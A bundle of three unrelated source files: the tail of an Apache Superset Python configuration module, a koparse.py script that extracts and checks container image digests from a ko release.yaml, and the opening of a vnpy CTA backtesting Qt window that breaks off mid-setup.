PUBLIC_ROLE_LIKE: Optional[str] = None
# ---------------------------------------------------
# Babel config for translations
# ---------------------------------------------------
# Setup default language
BABEL_DEFAULT_LOCALE = "en"
# Your application default translation path
BABEL_DEFAULT_FOLDER = "superset/translations"
# The allowed translation for you app
LANGUAGES = {
"en": {"flag": "us", "name": "English"},
"es": {"flag": "es", "name": "Spanish"},
"it": {"flag": "it", "name": "Italian"},
"fr": {"flag": "fr", "name": "French"},
"zh": {"flag": "cn", "name": "Chinese"},
"ja": {"flag": "jp", "name": "Japanese"},
"de": {"flag": "de", "name": "German"},
"pt": {"flag": "pt", "name": "Portuguese"},
"pt_BR": {"flag": "br", "name": "Brazilian Portuguese"},
"ru": {"flag": "ru", "name": "Russian"},
"ko": {"flag": "kr", "name": "Korean"},
}
# Turning off i18n by default as translations in most languages are
# incomplete and not well maintained.
LANGUAGES = {}
# ---------------------------------------------------
# Feature flags
# ---------------------------------------------------
# Feature flags that are set by default go here. Their values can be
# overwritten by those specified under FEATURE_FLAGS in super_config.py
# For example, DEFAULT_FEATURE_FLAGS = { 'FOO': True, 'BAR': False } here
# and FEATURE_FLAGS = { 'BAR': True, 'BAZ': True } in superset_config.py
# will result in combined feature flags of { 'FOO': True, 'BAR': True, 'BAZ': True }
DEFAULT_FEATURE_FLAGS: Dict[str, bool] = {
# Experimental feature introducing a client (browser) cache
"CLIENT_CACHE": False,
"ENABLE_EXPLORE_JSON_CSRF_PROTECTION": False,
"ENABLE_TEMPLATE_PROCESSING": False,
"KV_STORE": False,
"PRESTO_EXPAND_DATA": False,
# Exposes API endpoint to compute thumbnails
"THUMBNAILS": False,
"DASHBOARD_CACHE": False,
"REMOVE_SLICE_LEVEL_LABEL_COLORS": False,
"SHARE_QUERIES_VIA_KV_STORE": False,
"SIP_38_VIZ_REARCHITECTURE": False,
"TAGGING_SYSTEM": False,
"SQLLAB_BACKEND_PERSISTENCE": False,
"LISTVIEWS_DEFAULT_CARD_VIEW": False,
# Enables the replacement React views for all the FAB views (list, edit, show) with
# designs introduced in https://github.com/apache/incubator-superset/issues/8976
# (SIP-34). This is a work in progress so not all features available in FAB have
# been implemented.
"ENABLE_REACT_CRUD_VIEWS": True,
# When True, this flag allows display of HTML tags in Markdown components
"DISPLAY_MARKDOWN_HTML": True,
# When True, this escapes HTML (rather than rendering it) in Markdown components
"ESCAPE_MARKDOWN_HTML": False,
"SIP_34_ANNOTATIONS_UI": False,
"VERSIONED_EXPORT": False,
# Note that: RowLevelSecurityFilter is only given by default to the Admin role
# and the Admin Role does have the all_datasources security permission.
# But, if users create a specific role with access to RowLevelSecurityFilter MVC
# and a custom datasource access, the table dropdown will not be correctly filtered
# by that custom datasource access. So we are assuming a default security config,
# a custom security config could potentially give access to setting filters on
# tables that users do not have access to.
"ROW_LEVEL_SECURITY": False,
# Enables Alerts and reports new implementation
"ALERT_REPORTS": False,
"SIP_34_QUERY_SEARCH_UI": False,
}
# Set the default view to card/grid view if thumbnail support is enabled.
# Setting LISTVIEWS_DEFAULT_CARD_VIEW to False will force the default view to
# always be the table layout
if DEFAULT_FEATURE_FLAGS["THUMBNAILS"]:
DEFAULT_FEATURE_FLAGS["LISTVIEWS_DEFAULT_CARD_VIEW"] = True
# This is merely a default.
FEATURE_FLAGS: Dict[str, bool] = {}
# A function that receives a dict of all feature flags
# (DEFAULT_FEATURE_FLAGS merged with FEATURE_FLAGS)
# can alter it, and returns a similar dict. Note the dict of feature
# flags passed to the function is a deepcopy of the dict in the config,
# and can therefore be mutated without side-effect
#
# GET_FEATURE_FLAGS_FUNC can be used to implement progressive rollouts,
# role-based features, or a full on A/B testing framework.
#
# from flask import g, request
# def GET_FEATURE_FLAGS_FUNC(feature_flags_dict: Dict[str, bool]) -> Dict[str, bool]:
# if hasattr(g, "user") and g.user.is_active:
# feature_flags_dict['some_feature'] = g.user and g.user.id == 5
# return feature_flags_dict
GET_FEATURE_FLAGS_FUNC: Optional[Callable[[Dict[str, bool]], Dict[str, bool]]] = None
# ---------------------------------------------------
# Thumbnail config (behind feature flag)
# ---------------------------------------------------
THUMBNAIL_SELENIUM_USER = "Admin"
THUMBNAIL_CACHE_CONFIG: CacheConfig = {
"CACHE_TYPE": "null",
"CACHE_NO_NULL_WARNING": True,
}
# Used for thumbnails and other APIs: time in seconds before selenium
# times out when trying to locate an element on the page and when waiting
# for that element to load for an alert screenshot.
SCREENSHOT_LOCATE_WAIT = 10
SCREENSHOT_LOAD_WAIT = 60
# ---------------------------------------------------
# Image and file configuration
# ---------------------------------------------------
# The file upload folder, when using models with files
UPLOAD_FOLDER = BASE_DIR + "/app/static/uploads/"
UPLOAD_CHUNK_SIZE = 4096
# The image upload folder, when using models with images
IMG_UPLOAD_FOLDER = BASE_DIR + "/app/static/uploads/"
# The image upload url, when using models with images
IMG_UPLOAD_URL = "/static/uploads/"
# Setup image size default is (300, 200, True)
# IMG_SIZE = (300, 200, True)
CACHE_DEFAULT_TIMEOUT = 60 * 60 * 24
CACHE_CONFIG: CacheConfig = {"CACHE_TYPE": "null"}
TABLE_NAMES_CACHE_CONFIG: CacheConfig = {"CACHE_TYPE": "null"}
DASHBOARD_CACHE_TIMEOUT = 60 * 60 * 24 * 365
# CORS Options
ENABLE_CORS = False
CORS_OPTIONS: Dict[Any, Any] = {}
# Chrome allows up to 6 open connections per domain at a time. When there are more
# than 6 slices in a dashboard, many fetch requests are queued up waiting for the
# next available socket. PR #5039 is trying to allow domain sharding for Superset,
# and this feature will be enabled by configuration only (by default Superset
# doesn't allow cross-domain requests).
SUPERSET_WEBSERVER_DOMAINS = None
# Allowed format types for upload on Database view
EXCEL_EXTENSIONS = {"xlsx", "xls"}
CSV_EXTENSIONS = {"csv", "tsv", "txt"}
ALLOWED_EXTENSIONS = {*EXCEL_EXTENSIONS, *CSV_EXTENSIONS}
# CSV Options: key/value pairs that will be passed as argument to DataFrame.to_csv
# method.
# note: index option should not be overridden
CSV_EXPORT = {"encoding": "utf-8"}
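# A hedged sketch of passing additional DataFrame.to_csv keyword arguments
# (the extra keys below are illustrative pandas options, not recommended defaults):
# CSV_EXPORT = {"encoding": "utf-8", "sep": ";", "decimal": ","}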
# ---------------------------------------------------
# Time grain configurations
# ---------------------------------------------------
# List of time grains to disable in the application (see list of builtin
# time grains in superset/db_engine_specs.builtin_time_grains).
# For example: to disable 1 second time grain:
# TIME_GRAIN_DENYLIST = ['PT1S']
TIME_GRAIN_DENYLIST: List[str] = []
# Additional time grains to be supported using similar definitions as in
# superset/db_engine_specs.builtin_time_grains.
# For example: To add a new 2 second time grain:
# TIME_GRAIN_ADDONS = {'PT2S': '2 second'}
TIME_GRAIN_ADDONS: Dict[str, str] = {}
# Implementation of additional time grains per engine.
# The column to be truncated is denoted `{col}` in the expression.
# For example: To implement 2 second time grain on clickhouse engine:
# TIME_GRAIN_ADDON_EXPRESSIONS = {
# 'clickhouse': {
# 'PT2S': 'toDateTime(intDiv(toUInt32(toDateTime({col})), 2)*2)'
# }
# }
TIME_GRAIN_ADDON_EXPRESSIONS: Dict[str, Dict[str, str]] = {}
# ---------------------------------------------------
# List of viz_types not allowed in your environment
# For example: Disable pivot table and treemap:
# VIZ_TYPE_DENYLIST = ['pivot_table', 'treemap']
# ---------------------------------------------------
VIZ_TYPE_DENYLIST: List[str] = []
# ---------------------------------------------------
# List of data sources not to be refreshed in druid cluster
# ---------------------------------------------------
DRUID_DATA_SOURCE_DENYLIST: List[str] = []
# --------------------------------------------------
# Modules, datasources and middleware to be registered
# --------------------------------------------------
DEFAULT_MODULE_DS_MAP = OrderedDict(
[
("superset.connectors.sqla.models", ["SqlaTable"]),
("superset.connectors.druid.models", ["DruidDatasource"]),
]
)
ADDITIONAL_MODULE_DS_MAP: Dict[str, List[str]] = {}
ADDITIONAL_MIDDLEWARE: List[Callable[..., Any]] = []
# 1) https://docs.python-guide.org/writing/logging/
# 2) https://docs.python.org/2/library/logging.config.html
# Default configurator will consume the LOG_* settings below
LOGGING_CONFIGURATOR = DefaultLoggingConfigurator()
# Console Log Settings
LOG_FORMAT = "%(asctime)s:%(levelname)s:%(name)s:%(message)s"
LOG_LEVEL = "DEBUG"
# ---------------------------------------------------
# Enable Time Rotate Log Handler
# ---------------------------------------------------
# LOG_LEVEL = DEBUG, INFO, WARNING, ERROR, CRITICAL
ENABLE_TIME_ROTATE = False
TIME_ROTATE_LOG_LEVEL = "DEBUG"
FILENAME = os.path.join(DATA_DIR, "superset.log")
ROLLOVER = "midnight"
INTERVAL = 1
BACKUP_COUNT = 30
# Custom logger for auditing queries. This can be used to send executed queries
# to a structured immutable store for auditing purposes. The function is called
# for every query run, in both SQL Lab and charts/dashboards.
# def QUERY_LOGGER(
# database,
# query,
# schema=None,
# user=None,
# client=None,
# security_manager=None,
# log_params=None,
# ):
# pass
QUERY_LOGGER = None
# Set this API key to enable Mapbox visualizations
MAPBOX_API_KEY = os.environ.get("MAPBOX_API_KEY", "")
# Maximum number of rows returned from a database
# in async mode, no more than SQL_MAX_ROW will be returned and stored
# in the results backend. This also becomes the limit when exporting CSVs
SQL_MAX_ROW = 100000
# Maximum number of rows displayed in SQL Lab UI
# Is set to avoid out of memory/localstorage issues in browsers. Does not affect
# exported CSVs
DISPLAY_MAX_ROW = 10000
# Default row limit for SQL Lab queries. Is overridden by setting a new limit in
# the SQL Lab UI
DEFAULT_SQLLAB_LIMIT = 1000
# Maximum number of tables/views displayed in the dropdown window in SQL Lab.
MAX_TABLE_NAMES = 3000
# Adds a warning message on sqllab save query and schedule query modals.
SQLLAB_SAVE_WARNING_MESSAGE = None
SQLLAB_SCHEDULE_WARNING_MESSAGE = None
# Default celery config is to use SQLA as a broker, in a production setting
# you'll want to use a proper broker as specified here:
# http://docs.celeryproject.org/en/latest/getting-started/brokers/index.html
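# For illustration only (a sketch; adjust hosts and ports for your deployment),
# a Redis-backed broker setup might look like:
# class CeleryConfig:
#     BROKER_URL = "redis://localhost:6379/0"
#     CELERY_RESULT_BACKEND = "redis://localhost:6379/1"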
class CeleryConfig: # pylint: disable=too-few-public-methods
BROKER_URL = "sqla+sqlite:///celerydb.sqlite"
CELERY_IMPORTS = ("superset.sql_lab", "superset.tasks")
CELERY_RESULT_BACKEND = "db+sqlite:///celery_results.sqlite"
CELERYD_LOG_LEVEL = "DEBUG"
CELERYD_PREFETCH_MULTIPLIER = 1
CELERY_ACKS_LATE = False
CELERY_ANNOTATIONS = {
"sql_lab.get_sql_results": {"rate_limit": "100/s"},
"email_reports.send": {
"rate_limit": "1/s",
"time_limit": 120,
"soft_time_limit": 150,
"ignore_result": True,
},
}
CELERYBEAT_SCHEDULE = {
"email_reports.schedule_hourly": {
"task": "email_reports.schedule_hourly",
"schedule": crontab(minute=1, hour="*"),
}
}
CELERY_CONFIG = CeleryConfig # pylint: disable=invalid-name
# Set celery config to None to disable all the above configuration
# CELERY_CONFIG = None
# Additional static HTTP headers to be served by your Superset server. Note
# Flask-Talisman applies the relevant security HTTP headers.
#
# DEFAULT_HTTP_HEADERS: sets default values for HTTP headers. These may be overridden
# within the app
# OVERRIDE_HTTP_HEADERS: sets override values for HTTP headers. These values will
# override anything set within the app
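# For example (an illustrative sketch only, not a recommended security policy):
# DEFAULT_HTTP_HEADERS = {"X-Frame-Options": "SAMEORIGIN"}
# OVERRIDE_HTTP_HEADERS = {"Cache-Control": "no-store"}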
DEFAULT_HTTP_HEADERS: Dict[str, Any] = {}
OVERRIDE_HTTP_HEADERS: Dict[str, Any] = {}
HTTP_HEADERS: Dict[str, Any] = {}
# The db id here results in selecting this one as a default in SQL Lab
DEFAULT_DB_ID = None
# Timeout duration for SQL Lab synchronous queries
SQLLAB_TIMEOUT = 30
# Timeout duration for SQL Lab query validation
SQLLAB_VALIDATION_TIMEOUT = 10
# SQLLAB_DEFAULT_DBID
SQLLAB_DEFAULT_DBID = None
# The MAX duration (in seconds) a query can run for before being killed
# by celery.
SQLLAB_ASYNC_TIME_LIMIT_SEC = 60 * 60 * 6
# Some databases support running EXPLAIN queries that allow users to estimate
# query costs before they run. These EXPLAIN queries should have a small
# timeout.
SQLLAB_QUERY_COST_ESTIMATE_TIMEOUT = 10 # seconds
# Flag that controls if limit should be enforced on the CTA (create table as queries).
SQLLAB_CTAS_NO_LIMIT = False
# This allows you to define custom logic around the "CREATE TABLE AS" or CTAS feature
# in SQL Lab that defines where the target schema should be for a given user.
# Database `CTAS Schema` has a precedence over this setting.
# Example below returns a username and CTA queries will write tables into the schema
# name `username`
# SQLLAB_CTAS_SCHEMA_NAME_FUNC = lambda database, user, schema, sql: user.username
# This is a more involved example where, depending on the database, you can
# leverage data available to assign a schema for the CTA query:
# def compute_schema_name(database: Database, user: User, schema: str, sql: str) -> str:
# if database.name == 'mysql_payments_slave':
# return 'tmp_superset_schema'
# if database.name == 'presto_gold':
# return user.username
# if database.name == 'analytics':
# if 'analytics' in [r.name for r in user.roles]:
# return 'analytics_cta'
# else:
# return f'tmp_{schema}'
# Function accepts database object, user object, schema name and sql that will be run.
SQLLAB_CTAS_SCHEMA_NAME_FUNC: Optional[
Callable[["Database", "models.User", str, str], str]
] = None
# If enabled, it can be used to store the results of long-running queries
# in SQL Lab by using the "Run Async" button/feature
RESULTS_BACKEND: Optional[BaseCache] = None
# Use PyArrow and MessagePack for async query results serialization,
# rather than JSON. This feature requires additional testing from the
# community before it is fully adopted, so this config option is provided
# in order to disable should breaking issues be discovered.
RESULTS_BACKEND_USE_MSGPACK = True
# The S3 bucket where you want to store your external hive tables created
# from CSV files. For example, 'companyname-superset'
CSV_TO_HIVE_UPLOAD_S3_BUCKET = None
# The directory within the bucket specified above that will
# contain all the external tables
CSV_TO_HIVE_UPLOAD_DIRECTORY = "EXTERNAL_HIVE_TABLES/"
# Function that creates upload directory dynamically based on the
# database used, user and schema provided.
CSV_TO_HIVE_UPLOAD_DIRECTORY_FUNC: Callable[
["Database", "models.User", str], Optional[str]
] = lambda database, user, schema: CSV_TO_HIVE_UPLOAD_DIRECTORY
# The namespace within hive where the tables created from
# uploading CSVs will be stored.
UPLOADED_CSV_HIVE_NAMESPACE: Optional[str] = None
# Function that computes the allowed schemas for the CSV uploads.
# Allowed schemas will be a union of schemas_allowed_for_csv_upload
# db configuration and a result of this function.
# mypy doesn't catch that if case ensures list content being always str
ALLOWED_USER_CSV_SCHEMA_FUNC: Callable[["Database", "models.User"], List[str]] = (
lambda database, user: [UPLOADED_CSV_HIVE_NAMESPACE]
if UPLOADED_CSV_HIVE_NAMESPACE
else []
)
# Values that should be treated as nulls for the csv uploads.
CSV_DEFAULT_NA_NAMES = list(STR_NA_VALUES)
# A dictionary of items that gets merged into the Jinja context for
# SQL Lab. The existing context gets updated with this dictionary,
# meaning values for existing keys get overwritten by the content of this
# dictionary.
JINJA_CONTEXT_ADDONS: Dict[str, Callable[..., Any]] = {}
# A dictionary of macro template processors that gets merged into global
# template processors. The existing template processors get updated with this
# dictionary, which means the existing keys get overwritten by the content of this
# dictionary. The customized addons don't necessarily need to use the Jinja templating
# language. This allows you to define custom logic to process macro templates.
CUSTOM_TEMPLATE_PROCESSORS: Dict[str, Type[BaseTemplateProcessor]] = {}
# Roles that are controlled by the API / Superset and should not be changed
# by humans.
ROBOT_PERMISSION_ROLES = ["Public", "Gamma", "Alpha", "Admin", "sql_lab"]
CONFIG_PATH_ENV_VAR = "SUPERSET_CONFIG_PATH"
# If a callable is specified, it will be called at app startup while passing
# a reference to the Flask app. This can be used to alter the Flask app
# in whatever way is needed.
# example: FLASK_APP_MUTATOR = lambda app: app.before_request(f)
FLASK_APP_MUTATOR = None
# Set this to false if you don't want users to be able to request/grant
# datasource access requests from/to other users.
ENABLE_ACCESS_REQUEST = False
# smtp server configuration
EMAIL_NOTIFICATIONS = False # all the emails are sent using dryrun
SMTP_HOST = "localhost"
SMTP_STARTTLS = True
SMTP_SSL = False
SMTP_USER = "superset"
SMTP_PORT = 25
SMTP_PASSWORD = "superset"
SMTP_MAIL_FROM = "[email protected]"
ENABLE_CHUNK_ENCODING = False
# Whether to bump the logging level to ERROR on the flask_appbuilder package
# Set to False if/when debugging FAB related issues like
# permission management
SILENCE_FAB = True
FAB_ADD_SECURITY_VIEWS = True
FAB_ADD_SECURITY_PERMISSION_VIEW = False
FAB_ADD_SECURITY_VIEW_MENU_VIEW = False
FAB_ADD_SECURITY_PERMISSION_VIEWS_VIEW = False
# The link to a page containing common errors and their resolutions
# It will be appended at the bottom of sql_lab errors.
TROUBLESHOOTING_LINK = ""
# CSRF token timeout, set to None for a token that never expires
WTF_CSRF_TIME_LIMIT = 60 * 60 * 24 * 7
# This link should lead to a page with instructions on how to gain access to a
# Datasource. It will be placed at the bottom of permissions errors.
PERMISSION_INSTRUCTIONS_LINK = ""
# Integrate external Blueprints to the app by passing them to your
# configuration. These blueprints will get integrated in the app
BLUEPRINTS: List[Blueprint] = []
# Provide a callable that receives a tracking_url and returns another
# URL. This is used to translate internal Hadoop job tracker URL
# into a proxied one
TRACKING_URL_TRANSFORMER = lambda x: x
# Interval between consecutive polls when using Hive Engine
HIVE_POLL_INTERVAL = 5
# Interval between consecutive polls when using Presto Engine
# See here: https://github.com/dropbox/PyHive/blob/8eb0aeab8ca300f3024655419b93dad926c1a351/pyhive/presto.py#L93 # pylint: disable=line-too-long
PRESTO_POLL_INTERVAL = 1
# Allow for javascript controls components
# this enables programmers to customize certain charts (like the
# geospatial ones) by inputting javascript in controls. This exposes
# an XSS security vulnerability
ENABLE_JAVASCRIPT_CONTROLS = False
# The id of a template dashboard that should be copied to every new user
DASHBOARD_TEMPLATE_ID = None
# A callable that allows altering the database connection URL and params
# on the fly, at runtime. This allows for things like impersonation or
# arbitrary logic. For instance you can wire different users to
# use different connection parameters, or pass their email address as the
# username. The function receives the connection uri object, connection
# params, the username, and returns the mutated uri and params objects.
# Example:
# def DB_CONNECTION_MUTATOR(uri, params, username, security_manager, source):
# user = security_manager.find_user(username=username)
# if user and user.email:
# uri.username = user.email
# return uri, params
#
# Note that the returned uri and params are passed directly to sqlalchemy's
# create_engine, as in `create_engine(url, **params)`
DB_CONNECTION_MUTATOR = None
# A function that intercepts the SQL to be executed and can alter it.
# A typical use case is adding some sort of comment header
# with information such as the username and worker node information
#
# def SQL_QUERY_MUTATOR(sql, username, security_manager):
# dttm = datetime.now().isoformat()
# return f"-- [SQL LAB] {username} {dttm}\n{sql}"
SQL_QUERY_MUTATOR = None
# Enable / disable scheduled email reports
ENABLE_SCHEDULED_EMAIL_REPORTS = False
# Enable / disable Alerts, where users can define custom SQL that
# will send emails with screenshots of charts or dashboards periodically
# if it meets the criteria
ENABLE_ALERTS = False
# Slack API token for the superset reports
SLACK_API_TOKEN = None
SLACK_PROXY = None
# If enabled, certain features are run in debug mode
# Current list:
# * Emails are sent using dry-run mode (logging only)
SCHEDULED_EMAIL_DEBUG_MODE = False
# This auth provider is used by background (offline) tasks that need to access
# protected resources. Can be overridden by end users in order to support
# custom auth mechanisms
MACHINE_AUTH_PROVIDER_CLASS = "superset.utils.machine_auth.MachineAuthProvider"
# Email reports - minimum time resolution (in minutes) for the crontab
EMAIL_REPORTS_CRON_RESOLUTION = 15
# The MAX duration (in seconds) an email schedule can run for before being killed
# by celery.
EMAIL_ASYNC_TIME_LIMIT_SEC = 300
# Email report configuration
# From address in emails
EMAIL_REPORT_FROM_ADDRESS = "[email protected]"
# Send bcc of all reports to this address. Set to None to disable.
# This is useful for maintaining an audit trail of all email deliveries.
EMAIL_REPORT_BCC_ADDRESS = None
# User credentials to use for generating reports
# This user should have permissions to browse all the dashboards and
# slices.
# TODO: In the future, login as the owner of the item to generate reports
EMAIL_REPORTS_USER = "admin"
EMAIL_REPORTS_SUBJECT_PREFIX = "[Report] "
# The webdriver to use for generating reports. Use one of the following
# firefox:
# Requires: geckodriver and firefox installations
# Limitations: can be buggy at times
# chrome:
# Requires: headless chrome
# Limitations: unable to generate screenshots of elements
WEBDRIVER_TYPE = "firefox"
# Window size - this will impact the rendering of the data
WEBDRIVER_WINDOW = {"dashboard": (1600, 2000), "slice": (3000, 1200)}
# An optional override to the default auth hook used to provide auth to the
# offline webdriver
WEBDRIVER_AUTH_FUNC = None
# Any config options to be passed as-is to the webdriver
WEBDRIVER_CONFIGURATION: Dict[Any, Any] = {}
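# A hypothetical sketch of overriding webdriver keyword arguments (the key below
# is only an example of a selenium option, not a Superset default):
# WEBDRIVER_CONFIGURATION = {"service_log_path": "/dev/null"}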
# Additional args to be passed as arguments to the config object
# Note: these options are Chrome-specific. For FF, these should
# only include the "--headless" arg
WEBDRIVER_OPTION_ARGS = [
"--force-device-scale-factor=2.0",
"--high-dpi-support=2.0",
"--headless",
]
# The base URL to query for accessing the user interface
WEBDRIVER_BASEURL = "http://0.0.0.0:8080/"
# The base URL for the email report hyperlinks.
WEBDRIVER_BASEURL_USER_FRIENDLY = WEBDRIVER_BASEURL
# Time in seconds, selenium will wait for the page to load
# and render for the email report.
EMAIL_PAGE_RENDER_WAIT = 30
# Send user to a link where they can report bugs
BUG_REPORT_URL = None
# Send user to a link where they can read more about Superset
DOCUMENTATION_URL = None
DOCUMENTATION_TEXT = "Documentation"
DOCUMENTATION_ICON = None # Recommended size: 16x16
# What is the Last N days relative in the time selector to:
# 'today' means it is midnight (00:00:00) in the local timezone
# 'now' means it is relative to the query issue time
# If both start and end time is set to now, this will make the time
# filter a moving window. By only setting the end time to now,
# start time will be set to midnight, while end will be relative to
# the query issue time.
DEFAULT_RELATIVE_START_TIME = "today"
DEFAULT_RELATIVE_END_TIME = "today"
# Configure which SQL validator to use for each engine
SQL_VALIDATORS_BY_ENGINE = {"presto": "PrestoDBSQLValidator"}
# Do you want Talisman enabled?
TALISMAN_ENABLED = False
# If you want Talisman, how do you want it configured?
TALISMAN_CONFIG = {
"content_security_policy": None,
"force_https": True,
"force_https_permanent": False,
}
# It is possible to customize which tables and roles are featured in the RLS
# dropdown. When set, this dict is assigned to `add_form_query_rel_fields` and
# `edit_form_query_rel_fields` on `RowLevelSecurityFiltersModelView`. Example:
#
# from flask_appbuilder.models.sqla import filters
# RLS_FORM_QUERY_REL_FIELDS = {
# "roles": [["name", filters.FilterStartsWith, "RlsRole"]],
# "tables": [["table_name", filters.FilterContains, "rls"]]
# }
RLS_FORM_QUERY_REL_FIELDS: Optional[Dict[str, List[List[Any]]]] = None
#
# Flask session cookie options
#
# See https://flask.palletsprojects.com/en/1.1.x/security/#set-cookie-options
# for details
#
SESSION_COOKIE_HTTPONLY = True # Prevent cookie from being read by frontend JS?
SESSION_COOKIE_SECURE = False # Prevent cookie from being transmitted over non-tls?
SESSION_COOKIE_SAMESITE = "Lax" # One of [None, 'None', 'Lax', 'Strict']
# Flask configuration variables
SEND_FILE_MAX_AGE_DEFAULT = 60 * 60 * 24 * 365 # Cache static resources
# URI to database storing the example data, points to
# SQLALCHEMY_DATABASE_URI by default if set to `None`
SQLALCHEMY_EXAMPLES_URI = None
# Some sqlalchemy connection strings can open Superset to security risks.
# Typically these should not be allowed.
PREVENT_UNSAFE_DB_CONNECTIONS = True
# Path used to store SSL certificates that are generated when using custom certs.
# Defaults to temporary directory.
# Example: SSL_CERT_PATH = "/certs"
SSL_CERT_PATH: Optional[str] = None
# SIP-15 should be enabled for all new Superset deployments which ensures that the time
# range endpoints adhere to [start, end). For existing deployments admins should provide
# a dedicated period of time to allow chart producers to update their charts before
# mass migrating all charts to use the [start, end) interval.
#
# Note if no end date for the grace period is specified then the grace period is
# indefinite.
SIP_15_ENABLED = True
SIP_15_GRACE_PERIOD_END: Optional[date] = None # exclusive
SIP_15_DEFAULT_TIME_RANGE_ENDPOINTS = ["unknown", "inclusive"]
SIP_15_TOAST_MESSAGE = (
"Action Required: Preview then save your chart using the "
'new time range endpoints <a target="_blank" href="{url}" '
'class="alert-link">here</a>.'
)
# SQLA table mutator, every time we fetch the metadata for a certain table
# (superset.connectors.sqla.models.SqlaTable), we call this hook
# to allow mutating the object with this callback.
# This can be used to set any properties of the object based on naming
# conventions and such. You can find examples in the tests.
SQLA_TABLE_MUTATOR = lambda table: table
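# A minimal sketch of a mutator (assuming the table object exposes a
# ``description`` attribute; purely illustrative, not the library's default):
# def SQLA_TABLE_MUTATOR(table):
#     table.description = table.description or "Managed by Superset"
#     return table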
if CONFIG_PATH_ENV_VAR in os.environ:
# Explicitly import config module that is not necessarily in pythonpath; useful
# for case where app is being executed via pex.
try:
cfg_path = os.environ[CONFIG_PATH_ENV_VAR]
module = sys.modules[__name__]
override_conf = imp.load_source("superset_config", cfg_path)
for key in dir(override_conf):
if key.isupper():
setattr(module, key, getattr(override_conf, key))
print(f"Loaded your LOCAL configuration at [{cfg_path}]")
except Exception:
logger.exception(
"Failed to import config for %s=%s", CONFIG_PATH_ENV_VAR, cfg_path
)
raise
elif importlib.util.find_spec("superset_config") and not is_test():
try:
import superset_config # pylint: disable=import-error
from superset_config import * # type: ignore # pylint: disable=import-error,wildcard-import,unused-wildcard-import
print(f"Loaded your LOCAL configuration at [{superset_config.__file__}]")
except Exception:
logger.exception("Found but failed to import local superset_config")
raise
|
the-stack_106_19042
|
#!/usr/bin/env python3
"""
koparse.py parses release.yaml files from `ko`
The `ko` tool (https://github.com/google/go-containerregistry/tree/master/cmd/ko)
builds images and embeds the full names of the built images in the resulting
yaml files.
This script does two things:
* Parses those image names out of the release.yaml, including their digests, and
outputs those to stdout
* Verifies the list of built images against an expected list, to be sure that all
expected images were built (and no extra images were built)
"""
import argparse
import re
import sys
from typing import List
DIGEST_MARKER = "@sha256"
class ImagesMismatchError(Exception):
def __init__(self, missing: List[str], extra: List[str]):
self.missing = missing
self.extra = extra
def __str__(self):
errs = []
if self.missing:
errs.append("Images %s were expected but missing." % self.missing)
if self.extra:
errs.append("Images %s were present but not expected." %
self.extra)
return " ".join(errs)
class BadActualImageFormatError(Exception):
def __init__(self, image: str):
self.image = image
def __str__(self):
return "Format of image %s was unexpected, did not contain %s" % (self.image, DIGEST_MARKER)
def parse_release(base: str, path: str) -> List[str]:
"""Extracts built images from the release.yaml at path
Args:
base: The built images will be expected to start with this string,
other images will be ignored
path: The path to the file (release.yaml) that will contain the built images
Returns:
list of the images parsed from the file
"""
images = []
with open(path) as f:
for line in f:
match = re.search(base + ".*" + DIGEST_MARKER + ":[0-9a-f]*", line)
if match:
images.append(match.group(0))
return images
def compare_expected_images(expected: List[str], actual: List[str]) -> None:
"""Ensures that the list of actual images includes only the expected images
Args:
expected: A list of all of the names of images that are expected to have
been built, including the path to the image without the digest
actual: A list of the names of the built images, including the path to the
image and the digest
"""
for image in actual:
if DIGEST_MARKER not in image:
raise BadActualImageFormatError(image)
actual_no_digest = [image.split(DIGEST_MARKER)[0] for image in actual]
missing = set(expected) - set(actual_no_digest)
extra = set(actual_no_digest) - set(expected)
if missing or extra:
raise ImagesMismatchError(list(missing), list(extra))
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(
description="Parse expected built images from a release.yaml created by `ko`")
arg_parser.add_argument("--path", type=str, required=True,
help="Path to the release.yaml")
arg_parser.add_argument("--base", type=str, required=True,
help="String prefix which is used to find images within the release.yaml")
arg_parser.add_argument("--images", type=str, required=True, nargs="+",
help="List of all images expected to be built, without digests")
args = arg_parser.parse_args()
try:
images = parse_release(args.base, args.path)
compare_expected_images(args.images, images)
except (IOError, BadActualImageFormatError) as e:
sys.stderr.write("Error determining built images: %s\n" % e)
sys.exit(1)
except (ImagesMismatchError) as e:
sys.stderr.write("Expected images did not match: %s\n" % e)
with open(args.path) as f:
sys.stderr.write(f.read())
sys.exit(1)
print("\n".join(images))
|
the-stack_106_19043
|
import numpy as np
import pyqtgraph as pg
from datetime import datetime, timedelta
from ..engine import (
APP_NAME,
EVENT_BACKTESTER_LOG,
EVENT_BACKTESTER_BACKTESTING_FINISHED,
EVENT_BACKTESTER_OPTIMIZATION_FINISHED,
OptimizationSetting
)
from vnpy.trader.constant import Interval
from vnpy.trader.engine import MainEngine
from vnpy.trader.ui import QtCore, QtWidgets, QtGui
from vnpy.event import Event, EventEngine
class BacktesterManager(QtWidgets.QWidget):
""""""
signal_log = QtCore.pyqtSignal(Event)
signal_backtesting_finished = QtCore.pyqtSignal(Event)
signal_optimization_finished = QtCore.pyqtSignal(Event)
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__()
self.main_engine = main_engine
self.event_engine = event_engine
self.backtester_engine = main_engine.get_engine(APP_NAME)
self.class_names = []
self.settings = {}
self.target_display = ""
self.init_strategy_settings()
self.init_ui()
self.register_event()
self.backtester_engine.init_engine()
def init_strategy_settings(self):
""""""
self.class_names = self.backtester_engine.get_strategy_class_names()
for class_name in self.class_names:
setting = self.backtester_engine.get_default_setting(class_name)
self.settings[class_name] = setting
def init_ui(self):
""""""
self.setWindowTitle("CTA回测")
# Setting Part
self.class_combo = QtWidgets.QComboBox()
self.class_combo.addItems(self.class_names)
self.symbol_line = QtWidgets.QLineEdit("IF88.CFFEX")
self.interval_combo = QtWidgets.QComboBox()
for interval in Interval:
self.interval_combo.addItem(interval.value)
end_dt = datetime.now()
start_dt = end_dt - timedelta(days=3 * 365)
self.start_date_edit = QtWidgets.QDateEdit(
QtCore.QDate(
start_dt.year,
start_dt.month,
start_dt.day
)
)
self.end_date_edit = QtWidgets.QDateEdit(
QtCore.QDate.currentDate()
)
self.rate_line = QtWidgets.QLineEdit("0.000025")
self.slippage_line = QtWidgets.QLineEdit("0.2")
self.size_line = QtWidgets.QLineEdit("300")
self.pricetick_line = QtWidgets.QLineEdit("0.2")
self.capital_line = QtWidgets.QLineEdit("1000000")
backtesting_button = QtWidgets.QPushButton("开始回测")
backtesting_button.clicked.connect(self.start_backtesting)
optimization_button = QtWidgets.QPushButton("参数优化")
